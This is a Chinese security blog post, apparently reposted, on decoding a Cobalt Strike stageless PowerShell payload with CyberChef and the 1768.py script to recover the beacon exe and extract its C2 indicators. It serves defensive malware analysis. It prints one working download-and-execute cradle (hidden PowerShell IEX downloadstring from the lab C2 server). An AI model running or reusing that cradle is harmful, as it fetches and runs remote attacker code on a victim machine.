利用CyberChef&1768脚本获取IOC

admin 2022年10月10日14:17:14评论38 views字数 775阅读2分35秒阅读模式

使用CyberChef还原stageless的exe文件

Cobalt Strike提供了一系列自动生成恶意攻击文件的快捷操作。

今天就来看看Web Driver-by生成的一键上线脚本,怎么还原出exe文件。

测试环境:CS服务端:192.168.52.129,使用的是notion.profile

工具链接:CyberChef1768.py

先创建一个上线的一句话脚本

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.52.129:80/a'))"

利用CyberChef&1768脚本获取IOC

使用浏览器访问http://192.168.52.129:80/a,把网页保存下来

利用CyberChef&1768脚本获取IOC

把保存的a文件拖放到CyberChef里面,可以发现CyberChef能正常解析。

利用CyberChef&1768脚本获取IOC

里我们可以使用CyberChef的过滤功能把Base64编码内容给截断显示出来。

regular expression-->[0-9a-zA-Z+/]{30,}

利用CyberChef&1768脚本获取IOC

接着使用From Base64解密。在Output的右边会出现一个魔术棒的标志,它会提示你这是Gzip压缩的数据。

利用CyberChef&1768脚本获取IOC

那我们可以使用Gunzip解压数据。当添加了Gunzip插件后,明文也就出来了。

利用CyberChef&1768脚本获取IOC

在明文的powershell脚本中,发现paylaod藏在了另外一个Base64编码字符串中。

利用CyberChef&1768脚本获取IOC

将Base64编码的字符串进行异或处理。

利用CyberChef&1768脚本获取IOC

所以我们想要获取原始exe文件,只需要再次进行Base64字符串提取、解码和异或即可。

利用CyberChef&1768脚本获取IOC

选择保存文件

利用CyberChef&1768脚本获取IOC

使用1768脚本解密exe获取IOC

使用1768解密脚本获取IOC。脚本使用的时候不产生网络链接。成功获取到CS链接的uri和请求头。

利用CyberChef&1768脚本获取IOC

利用CyberChef&1768脚本获取IOC

原文始发于微信公众号(Desync InfoSec):利用CyberChef&1768脚本获取IOC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月10日14:17:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用CyberChef&1768脚本获取IOChttp://cn-sec.com/archives/1292987.html

发表评论

匿名网友 填写信息